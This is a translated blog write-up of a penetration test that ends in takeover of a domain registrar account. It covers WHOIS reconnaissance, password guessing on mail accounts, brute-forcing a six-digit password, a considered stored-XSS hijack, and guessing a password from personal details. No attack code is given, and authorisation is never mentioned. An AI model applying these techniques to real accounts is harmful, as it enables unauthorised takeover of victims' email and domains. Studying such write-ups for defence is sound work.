Perform penetration testing like a detective

Author: dangdang
Source: t00ls
 
The target site is aaaaa.com.
Only the web service is open. The site uses weblogic + apache axis + apache, and the axis management platform should run on 8080. Unfortunately, it is filtered by fw. No vulnerabilities can be exploited through manual analysis and wvs latest version check.
Observe the Home Page found that there is a contact mailbox address at the bottom of the home page: webmaster@aaaaaa.com, must be the administrator, search from this mailbox to start. I found mail.aaaaaa.com and guessed that the password was not broken. by collecting information, I learned that the email system was Anymacro. I checked the information and found that there was no vulnerability. Then google a bit, actually only find a webmaster@aaaaaa.com address-_-, it seems to want to detect xss through the black box will be more troublesome. Since the email system is not looking for a ready-made starting point, start with the aaaaaa.com domain name and use nslookup to find out that the domain name registration company website is www.xxxxxx.com.cn. Based on experience, many people use the domain name as their accounts, use aaaaaa/123456 to log on to the domain name management platform and prompt that the password is incorrect. Change the account name to the account named aaaaaa1. The system prompts that this account does not exist. The account name is aaaaaa, however, it is hard to guess the password for a long time. Next let's take a look at the "retrieve the member password" Is there a problem, with aaaaaa/webmaster@aaaaaa.com login "retrieve the member password", prompting the registered account is wrong, tried several common forms:
 
Aaaaaa@hotmail.com
Aaaaaa@163.com
Aaaaaa@sina.com
Aaaaaa@yahoo.com.cn
Aaaaaa@263.com
Aaaaaa@sohu.com
Aaaaaa@tom.com
............
 
All prompts are incorrect. Check the domain name registration information again. I used to use www.checkdomain.com to check the domain name registration information, and found the information as follows:
Domain Name: aaaaaa.com
ROID: xxxxxxxxxxxxx
Domain Status: OK
Registrant Organization: Beijing xxxxxxx
Registrant Name: James
Administrative Email: zhangsan@abc123.com
Sort soring Registrar: Beijing xxxxxxx Network Technology Co., Ltd.
Name Server: ns3.xxxxxx.com.cn
Registration Date:
Expiration Date:
 
The zhangsan@abc123.com is the registration mailbox at that time, and is registered in 03 years! Next try to use aaaaaa/zhangsan@abc123.com try to log on to the "retrieve member password" Page, prompt "Password Sent ". Sure enough... Now the problem is how to deal with this zhangsan@abc123.com mailbox, the results of the tragedy, nslookup query found that the mail system does not exist:
 
* ** Can't find server address for 'abc123. com ':
Server: ns1.cpip.net.cn
Address: 210.73.64.1
 
DNS request timed out.
Timeout was 2 seconds.
* ** Request to ns1.cpip.net.cn timed-out
 
Ping mail.abc123.com does not exist -_-
 
After comparison, we found that some of the names of @ abc123.com and @ aaaaaa.com are the same, so I guess abc123.com is an old email server and has already been deprecated. Now it is replaced with mail.aaaaaa.com, the new mail server.
Facts have confirmed that my preliminary judgment is correct. I tried to log on with the account of zhangsan on mail.aaaaaaaa.com, prompting that the password is incorrect. This account exists! By simply trying to guess the password, it is found that the password of zhangsan is zhangsan, and there is only one unread email in the mailbox. It was very good to check the mail Information a few months ago, it indicates that James seldom accesses this email address, which meets the requirements of social engineering attacks. The current conditions should be easy to find
 
The xss has gone through a total of other mailboxes, but it is meaningless to do so. Our goal is to get the domain name management password of aaaaaa.com. Since the domain name registration account uses an old email address, we can try to change it back. Using the information collected by the above work, we can perform a social engineering attack, unfortunately, it was found that it was difficult for social workers to do so. Through social interaction with customer service, we found that if we wanted to change the password through customer service, we had to fax the domain name applicant's phone, mobile phone, work unit, copy of ID card, and so on, the applicant's phone number is also required for confirmation. I am not Mitnick. I cannot go down the road of social engineering.
Next, we can only check whether the website of the domain name service provider has any problems and check whether there are any vulnerabilities. Next we will focus on manual checks. I applied for a Website user from a Domain Name Service Provider and found that the website login password is a random 6-digit number given by the system. The 6-digit password should still be far from broken. Generally, the registered users of a domain name website do not log on very quickly after configuring the domain name. Therefore, few users modify the login password. According to the above information, James rarely logged on to the domain name management platform (registered in 03 years, the registered email is still old ), so there is a high possibility that his password is the random 6-digit password of the system.
Now we have a clear test direction. We need to start working on dictionaries and tools to run passwords. The number of attacks remains at around 1500 per minute.
In the process of cracking, check whether the website is running normally. The time for running the entire dictionary is about 1000000/1500/60 = 11 hours. In fact, the dictionary will not be cracked until it is completed, the time required for cracking is within my acceptable range. In the end, I waited for only one hour and broke the password. The password was "177243 ". Log on to the website with aaaaaa/177243. The Member has a mydns management menu, but the password is still required for domain name modification. The 177243 password indicates incorrect, I tried some common passwords manually. Check whether there is text xss. I found a text xss in the member information modification. Here I can insert an xss code that uses cross-window hijacking + function hijacking, then, we will seduce Michael to log on to the domain name management platform and modify his personal information and domain name management password. In this way, we can get the domain name management password.
Xss attacks are tactically feasible, but it is still too troublesome to implement them. Therefore, I still try to use brute force cracking to attack the domain name and manage the password, first, go to "Modify member information" to obtain some personal information as a guess password. The main information collected is the name, phone number, mobile phone number, email address, zip code, and other information:
Name: Zhang San (deformation: zhangsan, zhangs, zhangsan123, etc)
Mobile Phone: 1581111111
Tel: 811111111
Zip code: 520520520
 
When I tried zip code, I finally saw the cute mydns domain name management platform interface ^ _ ^. This test is now complete. Although this test does not involve many technologies, it is more appealing from the whole idea. The entire situation is becoming clearer and clearer with the analysis and reasoning layer by layer and step-by-step scrutiny, finally, the goal was achieved. In fact, this article still has a lot of content not recorded, for example, I tried smtp protocol injection to get the "retrieve password" of the email ", in addition, the domain name service provider's email server test, many tests for aaaaaaa.com, and google hacking collection and verification information are all removed because the content is not important.
 
This article from Frandy's Blog: http://www.52sky.org address: http://www.52sky.org/92002.html